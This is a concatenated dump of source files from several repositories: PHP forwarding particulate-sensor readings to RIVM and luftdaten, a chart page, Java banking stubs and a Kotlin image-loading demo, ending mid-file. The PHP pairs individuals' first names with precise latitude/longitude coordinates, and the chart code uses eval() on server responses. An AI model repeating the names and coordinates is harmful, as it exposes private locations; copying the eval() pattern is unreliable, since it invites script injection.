if($_REQUEST['id'] == 69) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'GerardBeemteBroekland lat=52.25876,lon=6.02645';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-gerard';
}
}
if($_REQUEST['id'] == 71) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Niels lat=52.23575,lon=5.95370';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-niels';
}
}
if($_REQUEST['id'] == 72) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Johan lat=52.38935,lon=6.03010';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-johan';
}
}
if($_REQUEST['id'] == 75) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'PaJohan lat=52.03062,lon=5.57188';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-pajohan';
}
}
if($_REQUEST['id'] == 121) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Daan lat=52.25667,lon=6.03867';
}
}
if($_REQUEST['id'] == 122) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Frits lat=52.23330,lon=5.99250';
}
}
if($_REQUEST['id'] == 124) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'JeroenHendricksen lat=52.18349,lon=5.94239';
}
}
if($_REQUEST['id'] == 156) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'JelleJansen lat=52.29979,lon=5.04871';
}
}
if($sendToRIVM) {
$d = new DateTime();
$now = $d->format('Y-m-d\TH:i:s');
$d->sub(new DateInterval('PT59S'));
$minuteBefore = $d->format('Y-m-d\TH:i:s');
$data_string = 'm_fw,id='.$rivmSensorName.',timestamp_from="'.$minuteBefore.'Z",timestamp_to="'.$now.'Z",PM10='.str_replace(',','.',$pm10).',PM10-eenheid="ug/m3",PM10-meetopstelling="SDS011",PM2.5='.str_replace(',','.',$pm25).',PM2.5-meetopstelling="SDS011"';
$ch = curl_init('http://influx.rivm.nl:8086/write?db=fw');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
if($sendToLuftDaten) {
// luftdaten.info
$luftdatenData = '{"software_version": "1", "sensordatavalues":[{"value_type":"P1","value":"'.str_replace(',','.',$pm10).'"},{"value_type":"P2","value":"'.str_replace(',','.',$pm25).'"}]}';
$ch1 = curl_init('https://api.luftdaten.info/v1/push-sensor-data/');
curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch1, CURLOPT_POSTFIELDS, $luftdatenData);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch1, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
'X-Pin: 1',
'X-Sensor: '.$luftdatenSensorName));
$resultLuftDaten = curl_exec($ch1);
logerror('JSON to LuftDaten ('.$luftdatenSensorName.'): '.$luftdatenData);
logerror('Result from LuftDaten: '.$resultLuftDaten);
}
insertIntoInflux($nodeName, $influxData);
exit();
}
die("No node found");
?><file_sep><html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.0/themes/smoothness/jquery-ui.css">
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://apeldoornindata.nl/js/datetimepicker/moment-with-locales.js"></script>
<script type="text/javascript" src="https://apeldoornindata.nl/js/datetimepicker/bootstrap-datetimepicker.js"></script>
<link href="https://apeldoornindata.nl/js/datetimepicker/bootstrap-datetimepicker.css" rel="stylesheet">
<script type="text/javascript">
var data;
var chart;
var options;
var chartwidth;
var chartareawith;
var liveUpdates = true;
var lastPoint = Math.floor(new Date().getTime() / 1000);
google.charts.load('current', {'packages':['corechart']});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Temperatuur 1'); chartwidth = $('#chart_div').width();
var leftmargin = 60;
chartareawith = chartwidth - leftmargin;
options = {
chartArea : { left: leftmargin, top:10, bottom: 50, width: chartareawith, heigth: '100%'},
vAxis: {format:'#.# C'},
legend: {position: 'none'},
hAxis: {
format: 'dd/MM/yyy HH:mm',
}
};
chart = new google.visualization.LineChart(document.getElementById('chart_div'));
chart.draw(data, options);
refreshGraph();
function resizeChart () {
var container = document.getElementById("chart_div").firstChild.firstChild;
container.style.width = "100%";
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
chart.draw(data, options);
}
if (document.addEventListener) {
window.addEventListener('resize', resizeChart);
}
else if (document.attachEvent) {
window.attachEvent('onresize', resizeChart);
}
else {
window.resize = resizeChart;
}
}
function removeOldest() {
data.removeRow(data.getNumberOfRows()-1);
}
function addNewDataPoint(newValue) {
removeOldest();
var today = new Date();
var dd = today.getDate();
var mm = today.getMonth(); //January is 0!
var yyyy = today.getFullYear();
data.insertRows(0, [[new Date(yyyy, mm, dd, today.getHours(), today.getMinutes(), today.getSeconds()), newValue]]);
chart.draw(data, options);
}
function init() {
var graphPeriode = $("#graphperiode option:selected").val();
var jsonRows = $.ajax({
url: "https://apeldoornindata.nl/data.php/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
dataType: "json",
async: false
}).responseText;
// Create our data table out of JSON data loaded from server.
//url: "https://www.cloudscada.nl/nl/graphdata/tag/28/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
data.removeRows(0, data.getNumberOfRows());
data.insertRows(0, eval(jsonRows));
chart.draw(data, options);
}
function refreshGraph() {
var graphPeriode = $("#graphperiode option:selected").val();
var jsonRows = $.ajax({
url: "https://apeldoornindata.nl/data.php/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
dataType: "json",
async: false
}).responseText;
// Create our data table out of JSON data loaded from server.
//url: "https://www.cloudscada.nl/nl/graphdata/tag/28/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
data.removeRows(0, data.getNumberOfRows());
data.insertRows(0, eval(jsonRows));
chart.draw(data, options);
initDateTimePicker();
}
function previous() {
var graphPeriode = $("#graphperiode option:selected").val();
lastPoint = lastPoint - (graphPeriode * 60);
liveUpdates = false;
refreshGraph();
}
function next() {
var graphPeriode = $("#graphperiode option:selected").val();
lastPoint = lastPoint + (graphPeriode * 60);
if(lastPoint >= Math.floor(new Date().getTime() / 1000))
{
lastPoint = Math.floor(new Date().getTime() / 1000);
liveUpdates = true;
}
else
{
liveUpdates = false;
}
refreshGraph();
}
function updateLastPointAndRefreshGraph(lastPointPar) {
lastPoint = lastPointPar;
refreshGraph();
}
</script>
</head>
<body>
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading">Grafiek - Temperatuur 1</div>
<div class="panel-body">
<div id="chart_div" style="width: 100%; height: 500px;"></div>
<div class="row">
<div class="col-sm-5">
<div class="dropdown">
<select class="form-control" name="graphperiode" id="graphperiode" onchange="refreshGraph()">
<option value="1">1 min</option>
<option value="5">5 min</option>
<option value="10">10 min</option>
<option value="30">30 min</option>
<option value="60">1 uur</option>
<option value="360">6 uur</option>
<option value="720" selected="selected">12 uur</option>
<option value="1440">1 dag</option>
<option value="2880">2 dagen</option>
<option value="10080">7 dagen</option>
</select>
</div>
</div>
<div class="col-sm-5">
<div class="form-group">
<div class="input-group date" id="datetimepicker1">
<input type="text" class="form-control" id="datetimepickerinp"/>
<span class="input-group-addon">
<span class="glyphicon glyphicon-calendar"></span>
</span>
</div>
</div>
<script type="text/javascript">
$(function () {
$("#datetimepicker1").datetimepicker({format: "DD-MM-YYYY HH:mm:ss", allowInputToggle: true, showTodayButton: true, showClose: true, maxDate: new Date(lastPoint * 1000), defaultDate: new Date((lastPoint - ($("#graphperiode option:selected").val() * 60)) * 1000)}).on('dp.change', function(e){
updateLastPoint(e.date.unix());
});
});
function initDateTimePicker() {
$("#datetimepickerinp").val(moment(new Date((lastPoint - ($("#graphperiode option:selected").val() * 60)) * 1000)).format('DD-MM-YYYY HH:mm:ss'));
}
function updateLastPoint(firstPoint) {
//alert("Lastoint: " + firstPoint + " + " + ($("#graphperiode option:selected").val() * 60));
var aap = firstPoint + ($("#graphperiode option:selected").val() * 60);
if(aap >= Math.floor(new Date().getTime() / 1000))
{
aap = Math.floor(new Date().getTime() / 1000);
liveUpdates = true;
}
else
{
liveUpdates = false;
}
updateLastPointAndRefreshGraph(aap);
}
</script>
</div>
<div class="col-sm-2 text-center">
<button type="button" class="btn btn-primary glyphicon glyphicon-backward" onclick="previous()"></button>
<button type="button" class="btn btn-primary glyphicon glyphicon-forward" onclick="next()"></button>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
include('footer.php');
?>
</body>
</html>
|
4cd9c229a81858a993b8a44971719dfaf87c921f
|
[
"JavaScript",
"SQL",
"Markdown",
"PHP"
] | 34
|
PHP
|
TTNApeldoorn/ApeldoornInData
|
9053011360ddf95026c817504b395bb0d8cf92fb
|
e094afc6aff4168cf0fdac38c1956e8f5700750d
|
refs/heads/master
|
<repo_name>driatv/projetBanque<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/model/ClientModel.java
package com.adaming.myapp.model;
public class ClientModel {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/controller/ClientController.java
package com.adaming.myapp.controller;
public class ClientController {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/IGroupeDao.java
package com.adaming.myapp.dao;
public interface IGroupeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceGroupe.java
package com.adaming.myapp.services;
public interface IServiceGroupe {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/EmployeDaoImpl.java
package com.adaming.myapp.dao;
public class EmployeDaoImpl implements IEmployeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/entites/Compte.java
package com.adaming.myapp.entites;
public class Compte {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/controller/CompteController.java
package com.adaming.myapp.controller;
public class CompteController {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/ICompteDao.java
package com.adaming.myapp.dao;
public interface ICompteDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceEmploye.java
package com.adaming.myapp.services;
public interface IServiceEmploye {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/ServiceGroupeImpl.java
package com.adaming.myapp.services;
public class ServiceGroupeImpl implements IServiceGroupe{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/GenericDaoImpl.java
package com.adaming.myapp.dao;
public class GenericDaoImpl implements IGenericDao extends GenericAbstractJPA{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/IEmployeDao.java
package com.adaming.myapp.dao;
public interface IEmployeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/model/EmployeModel.java
package com.adaming.myapp.model;
public class EmployeModel {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceCompte.java
package com.adaming.myapp.services;
public interface IServiceCompte {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/GroupeDaoImpl.java
package com.adaming.myapp.dao;
public class GroupeDaoImpl implements IGroupeDao{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/ServiceClientImpl.java
package com.adaming.myapp.services;
public class ServiceClientImpl implements IServiceClient{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/entites/Client.java
package com.adaming.myapp.entites;
public class Client {
private String nom;
private String premon;
}
|
7513bb1fe00b5d40682e0de945b49bf4c905841b
|
[
"Java"
] | 17
|
Java
|
driatv/projetBanque
|
bc2698d5ffdea3020e0e99afa4a2baf7c1ad2aba
|
cbfad6f9e40091585a039a43cbc0a844456d2f25
|
refs/heads/master
|
<repo_name>kentlow2002/acr<file_sep>/source/src/serverballistics.h
#include "ballistics.h"
<file_sep>/README.md
acr
===
AssaultCube Reloaded (first-person-shooter game)
<file_sep>/source/src/serverevents.h
// processing of server events
void processevent(client *c, explodeevent &e)
{
clientstate &gs = c->state;
switch(e.gun)
{
case GUN_GRENADE:
if(!gs.grenades.remove(e.id)) return;
break;
default:
return;
}
for(int i = 1; i<c->events.length() && c->events[i].type==GE_HIT; i++)
{
hitevent &h = c->events[i].hit;
if(!clients.inrange(h.target)) continue;
client *target = clients[h.target];
if(target->type==ST_EMPTY || target->state.state!=CS_ALIVE || h.lifesequence!=target->state.lifesequence || h.dist<0 || h.dist>EXPDAMRAD) continue;
int j = 1;
for(j = 1; j<i; j++) if(c->events[j].hit.target==h.target) break;
if(j<i) continue;
int damage = int(guns[e.gun].damage*(1-h.dist/EXPDAMRAD));
bool chk_gun = e.gun==GUN_GRENADE;
bool chk_dir = h.dir[0]+h.dir[1]+h.dir[2]==0;
bool chk_dst = h.dist < 2.0f;
bool chk_cnr = c->clientnum == target->clientnum;
if(chk_gun && chk_dir && chk_dst && chk_cnr) damage = INT_MAX; // nade suicide
serverdamage(target, c, damage, e.gun, true, h.dir);
}
}
void processevent(client *c, shotevent &e)
{
clientstate &gs = c->state;
int wait = e.millis - gs.lastshot;
if(!gs.isalive(gamemillis) ||
e.gun<GUN_KNIFE || e.gun>=NUMGUNS ||
wait<gs.gunwait[e.gun] ||
gs.mag[e.gun]<=0)
return;
if(e.gun!=GUN_KNIFE) gs.mag[e.gun]--;
loopi(NUMGUNS) if(gs.gunwait[i]) gs.gunwait[i] = max(gs.gunwait[i] - (e.millis-gs.lastshot), 0);
gs.lastshot = e.millis;
gs.gunwait[e.gun] = attackdelay(e.gun);
if(e.gun==GUN_PISTOL && gs.akimbomillis>gamemillis) gs.gunwait[e.gun] /= 2;
sendf(-1, 1, "ri6x", SV_SHOTFX, c->clientnum, e.gun,
// int(e.from[0]*DMF), int(e.from[1]*DMF), int(e.from[2]*DMF),
int(e.to[0]*DMF), int(e.to[1]*DMF), int(e.to[2]*DMF),
c->clientnum);
gs.shotdamage += guns[e.gun].damage*(e.gun==GUN_SHOTGUN ? SGMAXDMGLOC : 1); // 2011jan17:ft: so accuracy stays correct, since SNIPER:headshot also "exceeds expectations" we use SGMAXDMGLOC instead of SGMAXDMGABS!
switch(e.gun)
{
case GUN_GRENADE: gs.grenades.add(e.id); break;
default:
{
int totalrays = 0, maxrays = e.gun==GUN_SHOTGUN ? 3*SGRAYS: 1;
int tothits_c = 0, tothits_m = 0, tothits_o = 0; // sgrays
for(int i = 1; i<c->events.length() && c->events[i].type==GE_HIT; i++)
{
hitevent &h = c->events[i].hit;
if(!clients.inrange(h.target)) continue;
client *target = clients[h.target];
if(target->type==ST_EMPTY || target->state.state!=CS_ALIVE || h.lifesequence!=target->state.lifesequence) continue;
int rays = 1, damage = 0;
bool gib = false;
if(e.gun == GUN_SHOTGUN)
{
h.info = isbigendian() ? endianswap(h.info) : h.info;
int bonusdist = h.info&0xFF;
int numhits_c = (h.info & 0x0000FF00) >> 8, numhits_m = (h.info & 0x00FF0000) >> 16, numhits_o = (h.info & 0xFF000000) >> 24;
tothits_c += numhits_c; tothits_m += numhits_m; tothits_o += numhits_o;
rays = numhits_c + numhits_m + numhits_o;
if(rays < 1 || tothits_c > SGRAYS || tothits_m > SGRAYS || tothits_o > SGRAYS || bonusdist > SGDMGBONUS) continue;
gib = rays == maxrays;
float fdamage = (SGDMGTOTAL/(21*100.0f)) * (numhits_o * SGCOdmg/10.0f + numhits_m * SGCMdmg/10.0f + numhits_c * SGCCdmg/10.0f);
fdamage += (float)bonusdist;
damage = (int)ceil(fdamage);
#ifdef ACAC
if (!sg_engine(target, c, numhits_c, numhits_m, numhits_o, bonusdist)) continue;
#endif
}
else
{
damage = rays*guns[e.gun].damage;
gib = e.gun == GUN_KNIFE;
if(e.gun == GUN_SNIPER && h.info != 0)
{
gib = true;
damage *= 3;
}
}
totalrays += rays;
if(totalrays>maxrays) continue;
serverdamage(target, c, damage, e.gun, gib, h.dir);
}
break;
}
}
}
void processevent(client *c, reloadevent &e)
{
clientstate &gs = c->state;
if(!gs.isalive(gamemillis) ||
e.gun<GUN_KNIFE || e.gun>=NUMGUNS ||
!reloadable_gun(e.gun) ||
gs.ammo[e.gun]<=0)
return;
bool akimbo = e.gun==GUN_PISTOL && gs.akimbomillis>e.millis;
int mag = (akimbo ? 2 : 1) * magsize(e.gun), numbullets = min(gs.ammo[e.gun], mag - gs.mag[e.gun]);
if(numbullets<=0) return;
gs.mag[e.gun] += numbullets;
gs.ammo[e.gun] -= numbullets;
int wait = e.millis - gs.lastshot;
sendf(-1, 1, "ri3", SV_RELOAD, c->clientnum, e.gun);
if(gs.gunwait[e.gun] && wait<gs.gunwait[e.gun]) gs.gunwait[e.gun] += reloadtime(e.gun);
else
{
loopi(NUMGUNS) if(gs.gunwait[i]) gs.gunwait[i] = max(gs.gunwait[i] - (e.millis-gs.lastshot), 0);
gs.lastshot = e.millis;
gs.gunwait[e.gun] += reloadtime(e.gun);
}
}
void processevent(client *c, akimboevent &e)
{
clientstate &gs = c->state;
if(!gs.isalive(gamemillis) || gs.akimbomillis) return;
gs.akimbomillis = e.millis+30000;
}
void clearevent(client &c)
{
int n = 1;
while(n<c.events.length() && c.events[n].type==GE_HIT) n++;
c.events.remove(0, n);
}
void processevents()
{
loopv(clients)
{
client &c = *clients[i];
if(c.type==ST_EMPTY || !c.isauthed || team_isspect(c.team)) continue;
clientstate &cs = c.state;
/*
// game ending nuke...
if(cs.nukemillis && cs.nukemillis <= gamemillis && minremain)
{
// boom... gg
//forceintermission = true;
cs.nukemillis = 0;
sendf(-1, 1, "ri4", N_STREAKUSE, i, STREAK_NUKE, 0);
// apply the nuke effect
nuke(c);
}
*/
// drown, bleed, regen
if(cs.state == CS_ALIVE)
{
/*
// drown underwater
if(cs.o.z < smapstats.hdr.waterlevel)
{
if(cs.drownmillis <= 0)
{
if(cs.drownmillis) // resume partial drowning
cs.drownval = max(cs.drownval - ((servmillis + cs.drownmillis) / 1000), 0);
cs.drownmillis = gamemillis;
}
char drownstate = max(0, (gamemillis - cs.drownmillis) / 1000 - 10);
while(cs.drownval < drownstate)
{
++cs.drownval;
serverdamage(&c, &c, (m_classic(gamemode, mutators) ? 5 : (cs.drownval + 10)) * HEALTHSCALE, WEAP_MAX + 13, FRAG_NONE, cs.o);
if(cs.state != CS_ALIVE) break; // dead!
}
}
else if(cs.drownmillis > 0)
cs.drownmillis = -cs.drownmillis; // save partial drowning
// bleeding--oh no!
if(cs.wounds.length())
{
loopv(cs.wounds)
{
wound &w = cs.wounds[i];
if(!valid_client(w.inflictor)) cs.wounds.remove(i--);
else if(w.lastdealt + 500 < gamemillis)
{
client &owner = *clients[w.inflictor];
const int bleeddmg = (m_zombie(gamemode) ? BLEEDDMGZ : owner.state.perk2 == PERK_POWER ? BLEEDDMGPLUS : BLEEDDMG) * HEALTHSCALE;
owner.state.damage += bleeddmg;
owner.state.shotdamage += bleeddmg;
// where were we wounded?
vec woundloc = cs.o;
woundloc.add(w.offset);
// blood fx and stuff
sendhit(owner, WEAP_KNIFE, woundloc, bleeddmg);
// use wounded location as damage source
serverdamage(&c, &owner, bleeddmg, WEAP_KNIFE, FRAG_NONE, woundloc, c.state.o.dist(owner.state.o));
w.lastdealt = gamemillis;
}
}
}
// health regeneration
else if(m_regen(gamemode, mutators) && cs.state == CS_ALIVE && cs.health < STARTHEALTH && cs.lastregen + (cs.perk1 == PERK_POWER ? REGENINT * .7f : REGENINT) < gamemillis){
int amt = round_(float((STARTHEALTH - cs.health) / 5 + 15));
if(cs.perk1 == PERK_POWER) amt *= 1.4f;
if(amt >= STARTHEALTH - cs.health)
amt = STARTHEALTH - cs.health;
sendf(-1, 1, "ri3", N_REGEN, i, cs.health += amt);
cs.lastregen = gamemillis;
}
*/
}
// not alive: spawn queue
else if(/*cs.state == CS_WAITING ||*/ (c.type == ST_AI && valid_client(c.ownernum) && clients[c.ownernum]->isonrightmap && cs.state == CS_DEAD && cs.lastspawn<0))
{
const int waitremain = SPAWNDELAY - gamemillis + cs.lastdeath;
extern int canspawn(client *c);
if(canspawn(&c) == SP_OK && waitremain <= 0)
sendspawn(&c);
}
// akimbo out!
if(cs.akimbomillis && cs.akimbomillis < gamemillis) { cs.akimbomillis = 0; cs.akimbo = false; }
while(c.events.length())
{
gameevent &e = c.events[0];
{
if(e.shot.millis>gamemillis) break;
if(e.shot.millis<c.lastevent) { clearevent(c); continue; }
c.lastevent = e.shot.millis;
}
switch(e.type)
{
case GE_SHOT: processevent(&c, e.shot); break;
case GE_PROJ: processevent(&c, e.explode); break;
case GE_AKIMBO: processevent(&c, e.akimbo); break;
case GE_RELOAD: processevent(&c, e.reload); break;
}
clearevent(c);
}
}
}
|
6faa3e212fa3bb1ff406e77b437c98c882b4b19d
|
[
"Markdown",
"C"
] | 3
|
C
|
kentlow2002/acr
|
d43b08115e2e3df4961ac6df15405e633cfec163
|
949fb69177bc72ed8b8522169c14cd96008b8c95
|
refs/heads/main
|
<repo_name>svlilyas/testImage<file_sep>/app/src/main/java/com/mobilion/testimage/MainActivity.kt
package com.mobilion.testimage
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.databinding.DataBindingUtil
import com.google.android.material.tabs.TabLayoutMediator
import com.mobilion.testimage.adapter.TabPagerAdapter
import com.mobilion.testimage.databinding.ActivityMainBinding
class MainActivity : AppCompatActivity() {
private lateinit var binding: ActivityMainBinding
private lateinit var pagerAdapter: TabPagerAdapter
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
binding = DataBindingUtil.setContentView(
this, R.layout.activity_main
)
pagerAdapter = TabPagerAdapter(supportFragmentManager, lifecycle)
binding.viewPager.adapter = pagerAdapter
TabLayoutMediator(binding.mainTabLayout, binding.viewPager) { tab, position ->
when (position) {
0 -> {
tab.text = getString(R.string.trouble)
}
1 -> {
tab.text = getString(R.string.solution)
}
2 -> {
tab.text = getString(R.string.network)
}
3 -> {
tab.text = getString(R.string.card_image)
}
}
}.attach()
}
}
<file_sep>/settings.gradle
rootProject.name = "TestImage"
include ':app'
<file_sep>/app/src/main/java/com/mobilion/testimage/extensions/ImageExtensions.kt
package com.mobilion.testimage.extensions
import android.widget.ImageView
import androidx.databinding.BindingAdapter
import com.bumptech.glide.Glide
import com.santalu.aspectratioimageview.AspectRatioImageView
import com.squareup.picasso.Picasso
@BindingAdapter("app:imageUrl")
fun ImageView.loadImage(url: String?) {
if (!url.isNullOrEmpty()) {
Glide.with(this).load(url).into(this)
}
}
@BindingAdapter("app:imageUrlGlide")
fun AspectRatioImageView.loadImageGlide(url: String?) {
if (!url.isNullOrEmpty()) {
/*Glide.with(this).load(url).placeholder(R.drawable.bmw_front_1_1920x1080)
.error(R.drawable.ic_baseline_report_problem_24).into(this)
*/
Glide.with(this).load(url).into(this)
}
}
@BindingAdapter("app:imageUrlPicasso")
fun AspectRatioImageView.loadImagePicasso(url: String?) {
if (!url.isNullOrEmpty()) {
Picasso.get().load(url).into(this)
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/tabs/CardImageFragment.kt
package com.mobilion.testimage.tabs
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.databinding.DataBindingUtil
import androidx.fragment.app.Fragment
import com.mobilion.testimage.R
import com.mobilion.testimage.adapter.MarginImageAdapter
import com.mobilion.testimage.databinding.FragmentCardImageBinding
import com.mobilion.testimage.fakedata.CarImages
class CardImageFragment : Fragment() {
private lateinit var binding: FragmentCardImageBinding
private lateinit var marginImageAdapter: MarginImageAdapter
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View {
binding =
DataBindingUtil.inflate(inflater, R.layout.fragment_card_image, container, false)
return binding.root
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
marginImageAdapter = MarginImageAdapter(CarImages.fakeDataMid())
binding.apply {
recyclerView.adapter = marginImageAdapter
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/adapter/TabPagerAdapter.kt
package com.mobilion.testimage.adapter
import androidx.fragment.app.Fragment
import androidx.fragment.app.FragmentManager
import androidx.lifecycle.Lifecycle
import androidx.viewpager2.adapter.FragmentStateAdapter
import com.mobilion.testimage.tabs.CardImageFragment
import com.mobilion.testimage.tabs.NetworkImageFragment
import com.mobilion.testimage.tabs.SolveImageFragment
import com.mobilion.testimage.tabs.TroubleImageFragment
class TabPagerAdapter(fragmentManager: FragmentManager, lifecycle: Lifecycle) :
FragmentStateAdapter(fragmentManager, lifecycle) {
override fun getItemCount(): Int {
return 4
}
override fun createFragment(position: Int): Fragment {
return when (position) {
0 -> {
TroubleImageFragment()
}
1 -> {
SolveImageFragment()
}
2 -> {
NetworkImageFragment()
}
3 -> {
CardImageFragment()
}
else -> {
Fragment()
}
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/fakedata/RequestType.kt
package com.mobilion.testimage.fakedata
enum class RequestType(val value: Int) {
GLIDE(0),
PICASSO(1);
companion object {
fun find(value: Int) = when (value) {
0 -> GLIDE
1 -> PICASSO
else -> throw Exception()
}
}
}
<file_sep>/README.md
# testImage
Solves image scale problems with Aspect Ratio.
<file_sep>/app/src/main/java/com/mobilion/testimage/adapter/MarginImageAdapter.kt
package com.mobilion.testimage.adapter
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.RecyclerView
import com.mobilion.testimage.databinding.ItemCarWithMarginBinding
import com.mobilion.testimage.extensions.loadImageGlide
import com.mobilion.testimage.extensions.loadImagePicasso
import com.mobilion.testimage.fakedata.CarImage
import com.mobilion.testimage.fakedata.RequestType
import com.mobilion.testimage.platform.BaseListAdapter
import com.mobilion.testimage.platform.BaseViewHolder
class MarginImageAdapter(
private var carImages: ArrayList<CarImage>,
) : BaseListAdapter<CarImage>(
itemsSame = { old, new -> old == new },
contentsSame = { old, new -> old == new }
) {
override fun onCreateViewHolder(
parent: ViewGroup,
inflater: LayoutInflater,
viewType: Int
): RecyclerView.ViewHolder {
return MarginImageViewHolder(parent, inflater)
}
override fun onBindViewHolder(holder: RecyclerView.ViewHolder, position: Int) {
when (holder) {
is MarginImageViewHolder -> {
holder.bind(carImages[position])
}
}
}
fun addData(addData: List<CarImage>) {
carImages = addData as ArrayList<CarImage>
}
override fun getItemCount(): Int {
return carImages.size
}
}
class MarginImageViewHolder(parent: ViewGroup, inflater: LayoutInflater) :
BaseViewHolder<ItemCarWithMarginBinding>(
ItemCarWithMarginBinding.inflate(inflater, parent, false)
) {
fun bind(carImage: CarImage) {
binding.apply {
item = carImage
when (carImage.type) {
RequestType.GLIDE -> imageView.loadImageGlide(carImage.imgUrl)
RequestType.PICASSO -> imageView.loadImagePicasso(carImage.imgUrl)
}
executePendingBindings()
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/fakedata/CarImage.kt
package com.mobilion.testimage.fakedata
data class CarImage(
var id: Int = 0,
var type: RequestType,
var imgUrl: String = "",
var title: String = ""
)
object CarImages {
fun fakeDataHigh(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/rGqKRhH/bmw-front-2-1920x1080.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/rZ6TJqf/bmw-front-left-1920x1080.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/9W7mqGh/bmw-front-right-1920x1080.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/LpzDyN0/bmw-inside-1-1920x1080.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/hBwbzrG/bmw-inside-2-1920x1080.jpg"
),
CarImage(
5,
RequestType.PICASSO,
"https://i.ibb.co/SfQggpw/bmw-inside-3-1920x1080.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/JqR70WS/bmw-left-side-1920x1080.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/PjDPhHs/bmw-street-1920x1080.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/9ZTVsDx/bmw-wide-1920x1080.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/Jd5Z3cR/bmw-front-1-1920x1080.jpg"
)
)
list.forEach {
it.title = "[1920X1080] ${it.type.name}"
}
return list
}
fun fakeDataMid(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/VqfD0C1/bmw-wide-1280x720.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/JtZTR0T/bmw-front-1-1280x720.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/HX4HHM7/bmw-front-2-1280x720.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/m5WtF9N/bmw-front-left-1280x720.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/ZLkDSS0/bmw-front-right-1280x720.jpg"
),
CarImage(
5,
RequestType.PICASSO,
